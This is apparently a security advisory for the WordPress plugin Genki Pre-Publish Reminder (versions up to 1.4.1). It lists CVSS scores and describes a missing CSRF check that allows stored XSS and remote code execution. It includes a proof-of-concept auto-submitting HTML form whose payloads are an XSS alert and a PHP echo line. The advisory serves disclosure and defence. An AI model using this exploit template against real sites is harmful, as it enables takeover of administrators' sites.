Daniel RufWPEX-ID:211816CE-D2BC-469B-9A8E-E0C2A5C4461BGenki Pre-Publish Reminder <= 1.4.1 - Stored XSS & RCE via CSRF
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and lead to Stored XSS as well as RCE when custom code is added via the plugin settings.
<form id="test" action="https://example.com/wp-admin/options-general.php?page=genki-pre-publish-reminder/genki_pre_publish_reminder.php" method="POST">
<input type="text" name="location" value="1">
<input type="text" name="bordercolor" value="#e6db55">
<input type="text" name="bgcolor" value="#ffffe0">
<textarea name="list">
<img src=x onerror=alert(1)>
<?php echo "hacked"; ?>
</textarea>
<input type="text" name="update_message" value="Save Changes">
</form>
<script>
document.getElementById("test").submit();
</script>Related
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P